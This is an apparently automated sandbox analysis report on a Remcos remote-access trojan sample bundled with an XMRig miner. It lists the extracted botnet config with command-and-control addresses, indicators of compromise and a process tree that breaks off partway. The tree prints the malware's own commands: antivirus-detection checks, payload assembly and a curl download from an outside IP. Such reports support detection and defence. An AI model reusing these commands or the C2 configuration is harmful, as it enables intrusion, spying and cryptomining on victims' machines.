remcos | ec059d014e9208dceded5ce614ea4f95e26c1ed45ad81ce5de348e5df7647197

Resubmissions

13-11-2024 08:24

241113-kaxexs1pfm 10

12-11-2024 13:12

241112-qfr1aatclg 10

Analysis

max time kernel
600s
max time network
600s
platform
windows10-2004_x64
resource
win10v2004-20241007-uk
resource tags

arch:x64arch:x86image:win10v2004-20241007-uklocale:uk-uaos:windows10-2004-x64systemwindows
submitted
12-11-2024 13:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

dze.exe
Size

1.0MB
MD5

fc877cda1618318751789044fb01a6bd
SHA1

15f90c8f5c543964a33d62d6e68f62a6d2712262
SHA256

ec059d014e9208dceded5ce614ea4f95e26c1ed45ad81ce5de348e5df7647197
SHA512

b96c3148e98b089ce25b1a2987df24f87bd0e7cd312ee9dc270ce3d6dacc48276213f313c162dc721440410c2ca1a265fd54eea546095a2cafbe2a34cac912d4
SSDEEP

24576:ruPaNmFtZU7DPNqRLhVVOgHD/raiDhFDsoUCcjL:NQzUvPNakGbD/soUdjL

Score

10^/10

remcos xmrig hstnw discovery miner rat spyware stealer upx

Malware Config

Extracted

Family

remcos

Botnet

hstnw

111.90.140.65:2404

111.90.140.65:80

111.90.140.65:81

111.90.140.65:10000

111.90.140.65:465

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
ughyuhgygtgyu-3AMAEZ
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs

Processes:

Crossword.pifChallenges.pifMechanics.pif

description	pid	Process	procid_target
PID 4064 created 3472	4064	Crossword.pif	56
PID 1316 created 3472	1316	Challenges.pif	56
PID 228 created 3472	228	Mechanics.pif	56

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 8 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/4076-2827-0x0000000140000000-0x00000001408F7000-memory.dmp	xmrig
behavioral1/memory/4076-2830-0x0000000140000000-0x00000001408F7000-memory.dmp	xmrig
behavioral1/memory/4076-2828-0x0000000140000000-0x00000001408F7000-memory.dmp	xmrig
behavioral1/memory/4076-2831-0x0000000140000000-0x00000001408F7000-memory.dmp	xmrig
behavioral1/memory/4076-2832-0x0000000140000000-0x00000001408F7000-memory.dmp	xmrig
behavioral1/memory/4076-2835-0x0000000140000000-0x00000001408F7000-memory.dmp	xmrig
behavioral1/memory/4076-2833-0x0000000140000000-0x00000001408F7000-memory.dmp	xmrig
behavioral1/memory/4076-2834-0x0000000140000000-0x00000001408F7000-memory.dmp	xmrig

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

dze.exeCrossword.pifRevenueDevices.exeEither.pifrm.exeChallenges.piflog.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	dze.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	Crossword.pif
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	RevenueDevices.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	Either.pif
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	rm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	Challenges.pif
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	log.exe

Drops startup file 6 IoCs

Processes:

cmd.execmd.execmd.exe

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ScanGuardian.url	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GloboSyncR.url	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GloboSyncR.url	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ScanGuardian.url	cmd.exe

Executes dropped EXE 11 IoCs

Processes:

Crossword.pifazvw.exeRevenueDevices.exeEither.pifazvw.exe7za.exerm.exeChallenges.piflog.exeMechanics.pifMechanics.pif

pid	Process
4064	Crossword.pif
4732	azvw.exe
3612	RevenueDevices.exe
1808	Either.pif
4872	azvw.exe
1408	7za.exe
2440	rm.exe
1316	Challenges.pif
4012	log.exe
228	Mechanics.pif
3612	Mechanics.pif

Loads dropped DLL 1 IoCs

Processes:

Either.pif

pid	Process
1808	Either.pif

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Enumerates processes with tasklist 1 TTPs 8 IoCs

discovery

Process Discovery

T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid	Process
1844	tasklist.exe
2484	tasklist.exe
4736	tasklist.exe
1460	tasklist.exe
3820	tasklist.exe
3508	tasklist.exe
396	tasklist.exe
4136	tasklist.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

Mechanics.pifMechanics.pif

description	pid	Process	procid_target
PID 228 set thread context of 3612	228	Mechanics.pif	660
PID 3612 set thread context of 4076	3612	Mechanics.pif	661

UPX packed file 13 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/4076-2822-0x0000000140000000-0x00000001408F7000-memory.dmp	upx
behavioral1/memory/4076-2824-0x0000000140000000-0x00000001408F7000-memory.dmp	upx
behavioral1/memory/4076-2823-0x0000000140000000-0x00000001408F7000-memory.dmp	upx
behavioral1/memory/4076-2826-0x0000000140000000-0x00000001408F7000-memory.dmp	upx
behavioral1/memory/4076-2827-0x0000000140000000-0x00000001408F7000-memory.dmp	upx
behavioral1/memory/4076-2825-0x0000000140000000-0x00000001408F7000-memory.dmp	upx
behavioral1/memory/4076-2830-0x0000000140000000-0x00000001408F7000-memory.dmp	upx
behavioral1/memory/4076-2828-0x0000000140000000-0x00000001408F7000-memory.dmp	upx
behavioral1/memory/4076-2831-0x0000000140000000-0x00000001408F7000-memory.dmp	upx
behavioral1/memory/4076-2832-0x0000000140000000-0x00000001408F7000-memory.dmp	upx
behavioral1/memory/4076-2835-0x0000000140000000-0x00000001408F7000-memory.dmp	upx
behavioral1/memory/4076-2833-0x0000000140000000-0x00000001408F7000-memory.dmp	upx
behavioral1/memory/4076-2834-0x0000000140000000-0x00000001408F7000-memory.dmp	upx

Drops file in Windows directory 17 IoCs

Processes:

RevenueDevices.exelog.exedze.exerm.exe

description	ioc	Process
File opened for modification	C:\Windows\McLol	RevenueDevices.exe
File opened for modification	C:\Windows\DetailParcel	log.exe
File opened for modification	C:\Windows\DouglasWind	dze.exe
File opened for modification	C:\Windows\BrushSub	RevenueDevices.exe
File opened for modification	C:\Windows\JamesThesaurus	rm.exe
File opened for modification	C:\Windows\TmpMoon	RevenueDevices.exe
File opened for modification	C:\Windows\NotifiedAaron	RevenueDevices.exe
File opened for modification	C:\Windows\BradfordQuoted	log.exe
File opened for modification	C:\Windows\HumanUtc	rm.exe
File opened for modification	C:\Windows\ChangingDescending	rm.exe
File opened for modification	C:\Windows\ExcitingMayor	rm.exe
File opened for modification	C:\Windows\CloselyAppropriate	rm.exe
File opened for modification	C:\Windows\CompAvoiding	log.exe
File opened for modification	C:\Windows\SoilOasis	dze.exe
File opened for modification	C:\Windows\RebatesPalm	dze.exe
File opened for modification	C:\Windows\TheeCircles	rm.exe
File opened for modification	C:\Windows\WishesPatricia	log.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

schtasks.execmd.execmd.execmd.exereg.execmd.exefindstr.execmd.execmd.execmd.execmd.exereg.execmd.exeRevenueDevices.execmd.execmd.exereg.execmd.execmd.execmd.exeschtasks.exeRobocopy.exereg.exeschtasks.execmd.exedze.execmd.execmd.execmd.execmd.execmd.exereg.exereg.execmd.exefindstr.exereg.execmd.execmd.execmd.execmd.exereg.exeschtasks.execmd.execmd.execmd.execmd.exereg.execmd.execmd.execmd.execmd.execmd.execmd.exereg.execmd.execmd.execmd.execmd.execmd.exereg.exereg.execmd.execmd.execmd.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RevenueDevices.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Robocopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dze.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

Processes:

cmd.exeRobocopy.exe

pid	Process
1460	cmd.exe
1196	Robocopy.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

Processes:

systeminfo.exe

pid	Process
3880	systeminfo.exe

Modifies registry class 1 IoCs

Processes:

Challenges.pif

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	Challenges.pif

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Crossword.pif

pid	Process
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Crossword.pif

pid	Process
4064	Crossword.pif

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

tasklist.exetasklist.exeWMIC.exeCrossword.piftasklist.exetasklist.exeRobocopy.exe7za.exe

description	pid	Process
Token: SeDebugPrivilege	4736	tasklist.exe
Token: SeDebugPrivilege	1460	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2260	WMIC.exe
Token: SeSecurityPrivilege	2260	WMIC.exe
Token: SeTakeOwnershipPrivilege	2260	WMIC.exe
Token: SeLoadDriverPrivilege	2260	WMIC.exe
Token: SeSystemProfilePrivilege	2260	WMIC.exe
Token: SeSystemtimePrivilege	2260	WMIC.exe
Token: SeProfSingleProcessPrivilege	2260	WMIC.exe
Token: SeIncBasePriorityPrivilege	2260	WMIC.exe
Token: SeCreatePagefilePrivilege	2260	WMIC.exe
Token: SeBackupPrivilege	2260	WMIC.exe
Token: SeRestorePrivilege	2260	WMIC.exe
Token: SeShutdownPrivilege	2260	WMIC.exe
Token: SeDebugPrivilege	2260	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2260	WMIC.exe
Token: SeRemoteShutdownPrivilege	2260	WMIC.exe
Token: SeUndockPrivilege	2260	WMIC.exe
Token: SeManageVolumePrivilege	2260	WMIC.exe
Token: 33	2260	WMIC.exe
Token: 34	2260	WMIC.exe
Token: 35	2260	WMIC.exe
Token: 36	2260	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2260	WMIC.exe
Token: SeSecurityPrivilege	2260	WMIC.exe
Token: SeTakeOwnershipPrivilege	2260	WMIC.exe
Token: SeLoadDriverPrivilege	2260	WMIC.exe
Token: SeSystemProfilePrivilege	2260	WMIC.exe
Token: SeSystemtimePrivilege	2260	WMIC.exe
Token: SeProfSingleProcessPrivilege	2260	WMIC.exe
Token: SeIncBasePriorityPrivilege	2260	WMIC.exe
Token: SeCreatePagefilePrivilege	2260	WMIC.exe
Token: SeBackupPrivilege	2260	WMIC.exe
Token: SeRestorePrivilege	2260	WMIC.exe
Token: SeShutdownPrivilege	2260	WMIC.exe
Token: SeDebugPrivilege	2260	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2260	WMIC.exe
Token: SeRemoteShutdownPrivilege	2260	WMIC.exe
Token: SeUndockPrivilege	2260	WMIC.exe
Token: SeManageVolumePrivilege	2260	WMIC.exe
Token: 33	2260	WMIC.exe
Token: 34	2260	WMIC.exe
Token: 35	2260	WMIC.exe
Token: 36	2260	WMIC.exe
Token: 33	4064	Crossword.pif
Token: SeIncBasePriorityPrivilege	4064	Crossword.pif
Token: SeDebugPrivilege	3820	tasklist.exe
Token: SeDebugPrivilege	3508	tasklist.exe
Token: 33	4064	Crossword.pif
Token: SeIncBasePriorityPrivilege	4064	Crossword.pif
Token: 33	4064	Crossword.pif
Token: SeIncBasePriorityPrivilege	4064	Crossword.pif
Token: 33	4064	Crossword.pif
Token: SeIncBasePriorityPrivilege	4064	Crossword.pif
Token: SeBackupPrivilege	1196	Robocopy.exe
Token: SeRestorePrivilege	1196	Robocopy.exe
Token: SeSecurityPrivilege	1196	Robocopy.exe
Token: SeTakeOwnershipPrivilege	1196	Robocopy.exe
Token: SeRestorePrivilege	1408	7za.exe
Token: 35	1408	7za.exe
Token: SeSecurityPrivilege	1408	7za.exe
Token: SeSecurityPrivilege	1408	7za.exe
Token: 33	4064	Crossword.pif
Token: SeIncBasePriorityPrivilege	4064	Crossword.pif

Suspicious use of FindShellTrayWindow 13 IoCs

Processes:

Crossword.pifEither.pifChallenges.pifMechanics.pifexplorer.exe

pid	Process
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
1808	Either.pif
1808	Either.pif
1808	Either.pif
1316	Challenges.pif
1316	Challenges.pif
1316	Challenges.pif
228	Mechanics.pif
228	Mechanics.pif
228	Mechanics.pif
4076	explorer.exe

Suspicious use of SendNotifyMessage 12 IoCs

Processes:

Crossword.pifEither.pifChallenges.pifMechanics.pif

pid	Process
4064	Crossword.pif
4064	Crossword.pif
4064	Crossword.pif
1808	Either.pif
1808	Either.pif
1808	Either.pif
1316	Challenges.pif
1316	Challenges.pif
1316	Challenges.pif
228	Mechanics.pif
228	Mechanics.pif
228	Mechanics.pif

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

Either.pifChallenges.pif

pid	Process
1808	Either.pif
1316	Challenges.pif
1316	Challenges.pif

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

dze.execmd.exeCrossword.pifcmd.execmd.execmd.execmd.execmd.exe

description	pid	Process	procid_target
PID 920 wrote to memory of 1876	920	dze.exe	84
PID 920 wrote to memory of 1876	920	dze.exe	84
PID 920 wrote to memory of 1876	920	dze.exe	84
PID 1876 wrote to memory of 4736	1876	cmd.exe	91
PID 1876 wrote to memory of 4736	1876	cmd.exe	91
PID 1876 wrote to memory of 4736	1876	cmd.exe	91
PID 1876 wrote to memory of 3248	1876	cmd.exe	92
PID 1876 wrote to memory of 3248	1876	cmd.exe	92
PID 1876 wrote to memory of 3248	1876	cmd.exe	92
PID 1876 wrote to memory of 1460	1876	cmd.exe	94
PID 1876 wrote to memory of 1460	1876	cmd.exe	94
PID 1876 wrote to memory of 1460	1876	cmd.exe	94
PID 1876 wrote to memory of 1580	1876	cmd.exe	95
PID 1876 wrote to memory of 1580	1876	cmd.exe	95
PID 1876 wrote to memory of 1580	1876	cmd.exe	95
PID 1876 wrote to memory of 4984	1876	cmd.exe	97
PID 1876 wrote to memory of 4984	1876	cmd.exe	97
PID 1876 wrote to memory of 4984	1876	cmd.exe	97
PID 1876 wrote to memory of 4092	1876	cmd.exe	98
PID 1876 wrote to memory of 4092	1876	cmd.exe	98
PID 1876 wrote to memory of 4092	1876	cmd.exe	98
PID 1876 wrote to memory of 2908	1876	cmd.exe	99
PID 1876 wrote to memory of 2908	1876	cmd.exe	99
PID 1876 wrote to memory of 2908	1876	cmd.exe	99
PID 1876 wrote to memory of 4064	1876	cmd.exe	100
PID 1876 wrote to memory of 4064	1876	cmd.exe	100
PID 1876 wrote to memory of 4064	1876	cmd.exe	100
PID 1876 wrote to memory of 4404	1876	cmd.exe	101
PID 1876 wrote to memory of 4404	1876	cmd.exe	101
PID 1876 wrote to memory of 4404	1876	cmd.exe	101
PID 4064 wrote to memory of 3252	4064	Crossword.pif	102
PID 4064 wrote to memory of 3252	4064	Crossword.pif	102
PID 4064 wrote to memory of 3252	4064	Crossword.pif	102
PID 4064 wrote to memory of 3532	4064	Crossword.pif	107
PID 4064 wrote to memory of 3532	4064	Crossword.pif	107
PID 4064 wrote to memory of 3532	4064	Crossword.pif	107
PID 3532 wrote to memory of 2260	3532	cmd.exe	109
PID 3532 wrote to memory of 2260	3532	cmd.exe	109
PID 3532 wrote to memory of 2260	3532	cmd.exe	109
PID 4064 wrote to memory of 5052	4064	Crossword.pif	110
PID 4064 wrote to memory of 5052	4064	Crossword.pif	110
PID 4064 wrote to memory of 5052	4064	Crossword.pif	110
PID 4064 wrote to memory of 2312	4064	Crossword.pif	112
PID 4064 wrote to memory of 2312	4064	Crossword.pif	112
PID 4064 wrote to memory of 2312	4064	Crossword.pif	112
PID 2312 wrote to memory of 2324	2312	cmd.exe	114
PID 2312 wrote to memory of 2324	2312	cmd.exe	114
PID 2312 wrote to memory of 2324	2312	cmd.exe	114
PID 4064 wrote to memory of 3132	4064	Crossword.pif	117
PID 4064 wrote to memory of 3132	4064	Crossword.pif	117
PID 4064 wrote to memory of 3132	4064	Crossword.pif	117
PID 3132 wrote to memory of 4008	3132	cmd.exe	119
PID 3132 wrote to memory of 4008	3132	cmd.exe	119
PID 3132 wrote to memory of 4008	3132	cmd.exe	119
PID 4064 wrote to memory of 1892	4064	Crossword.pif	120
PID 4064 wrote to memory of 1892	4064	Crossword.pif	120
PID 4064 wrote to memory of 1892	4064	Crossword.pif	120
PID 1892 wrote to memory of 1396	1892	cmd.exe	122
PID 1892 wrote to memory of 1396	1892	cmd.exe	122
PID 1892 wrote to memory of 1396	1892	cmd.exe	122
PID 4064 wrote to memory of 932	4064	Crossword.pif	123
PID 4064 wrote to memory of 932	4064	Crossword.pif	123
PID 4064 wrote to memory of 932	4064	Crossword.pif	123
PID 932 wrote to memory of 3896	932	cmd.exe	125

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3472
- C:\Users\Admin\AppData\Local\Temp\dze.exe
  "C:\Users\Admin\AppData\Local\Temp\dze.exe"
  2⤵
  - Checks computer location settings
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:920
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy Tuition Tuition.cmd & Tuition.cmd
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1876
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4736
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "wrsa opssvc"
      4⤵
      PID:3248
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1460
  - - C:\Windows\SysWOW64\findstr.exe
      findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1580
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c md 226443
      4⤵
      PID:4984
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V "AthleticsTabletsUserImaging" Slovenia
      4⤵
      PID:4092
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c copy /b ..\Tackle + ..\Heather + ..\Column + ..\Environment + ..\Events + ..\Merit + ..\Law + ..\Explanation d
      4⤵
      PID:2908
  - - C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif
      Crossword.pif d
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Checks computer location settings
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:4064
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\Admin\AppData\Local\temp\465 2>&1
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3532
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2260
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\temp\465 > C:\Users\Admin\AppData\Local\temp\435
        5⤵
        
        PID:5052
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\krcax" "178.215.224.252/v10/ukyh.php?jspo=6"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2312
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\krcax" "178.215.224.252/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:2324
    - - C:\Windows\SysWOW64\cmd.exe
        
